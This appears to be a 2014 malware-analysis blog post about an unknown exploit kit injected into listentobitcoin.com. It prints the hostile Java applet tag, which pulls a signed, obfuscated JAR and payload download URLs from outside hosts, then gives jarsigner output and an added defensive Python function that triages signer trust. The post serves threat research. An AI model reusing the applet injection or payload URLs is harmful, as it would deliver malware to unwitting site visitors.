malwageddon

Unknown EK(listentobitcoin.com) - 2014-01-14

Jan 14th, 2014
Interesting how it has different parameters based on country code - US, CA, UK and NL.

<applet name="JavaUpdate" code="SecureApplet.class" archive="http://secure-jar.com/TXDP/Java.jar" width="0" height="0">
<param name="us" value="javasan.exe">
<param name="ca" value="http://ge.tt/api/1/files/6xpAHbD1/0/blob?download">
<param name="uk" value="http://www.listentobitcoin.com">
<param name="nl" value="fox33">

JAR file is obfuscated with ZKM. It's signed with a certificate:

s 231 Thu Jan 02 15:40:22 KRAT 2014 META-INF/MANIFEST.MF

X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
[certificate will expire on 02.04.14 23:40]
[CertPath not validated: Path does not chain with any of the trust anchors]

320 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.SF
1065 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.DSA
0 Thu Jan 02 15:36:24 KRAT 2014 META-INF/
sm 4943 Thu Jan 02 15:36:24 KRAT 2014 SecureApplet.class

X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
[certificate will expire on 02.04.14 23:40]
[CertPath not validated: Path does not chain with any of the trust anchors]

s = signature was verified
m = entry is listed in manifest
k = at least one certificate was found in keystore
i = at least one certificate was found in identity scope

jar verified.

Warning:
This jar contains entries whose signer certificate will expire within six months.
This jar contains entries whose certificate chain is not validated.

Once the JAR file is executed it sends the browser to epickit.net to grab something else. I'm getting the following message though.

The owner of this website (epickit.net) has banned your access based on your browser's signature (ecb9341fedc02dd-ua93).

So, EpicKit, ah...
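
The jarsigner listing above ends in "jar verified." even though the certificate chains to no trust anchor. As an added example (not part of the original paste), this Python function parses output of that shape and reports signature integrity separately from signer trust. The name `triage`, the verdict strings and the abridged sample are assumptions made for illustration.

```python
import re

# Constructed sample: abridged jarsigner verification output in the
# shape shown in the paste (whitespace collapsed as it appears there).
SAMPLE = """\
s 231 Thu Jan 02 15:40:22 KRAT 2014 META-INF/MANIFEST.MF

X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
[CertPath not validated: Path does not chain with any of the trust anchors]

320 Thu Jan 02 15:40:22 KRAT 2014 META-INF/RAZMATAZ.SF
0 Thu Jan 02 15:36:24 KRAT 2014 META-INF/
sm 4943 Thu Jan 02 15:36:24 KRAT 2014 SecureApplet.class

X.509, CN=James Patrick, OU=EU, O=EU, L=Amsterdam, ST=Amsterdam, C=NL
[CertPath not validated: Path does not chain with any of the trust anchors]

jar verified.
"""

# Assumed entry layout: [flags] size weekday month day time zone year name
ENTRY = re.compile(r"^\s*([smki]*)\s*(\d+)\s+\w{3} \w{3} \d{2} \S+ \S+ \d{4}\s+(\S+)$")
SIGNER = re.compile(r"^\s*X\.509, (.+)$")

def triage(output):
    """Summarise jarsigner verification output for a trust decision."""
    entries, signers, chain_errors = {}, set(), set()
    for line in output.splitlines():
        if m := ENTRY.match(line):
            entries[m.group(3)] = m.group(1)      # entry name -> flags
        elif m := SIGNER.match(line):
            signers.add(m.group(1).strip())       # subject DN of the signer
        elif "CertPath not validated" in line:
            chain_errors.add(line.strip(" []"))
    # META-INF/ holds signing metadata (.SF/.DSA are never signed themselves);
    # only payload entries are required to carry the "s" flag.
    unsigned = sorted(n for n, f in entries.items()
                      if not n.startswith("META-INF/") and "s" not in f)
    verified = "jar verified." in output
    if not verified or unsigned:
        verdict = "reject: signature missing or broken"
    elif chain_errors:
        verdict = "reject: integrity ok, signer not trusted"
    else:
        verdict = "signer chains to a trust anchor"
    return {"verified": verified, "signers": sorted(signers), "unsigned": unsigned,
            "chain_errors": sorted(chain_errors), "verdict": verdict}
```

Calling `triage(SAMPLE)` yields the untrusted-signer verdict: the signature is internally consistent, but the signer is self-asserted.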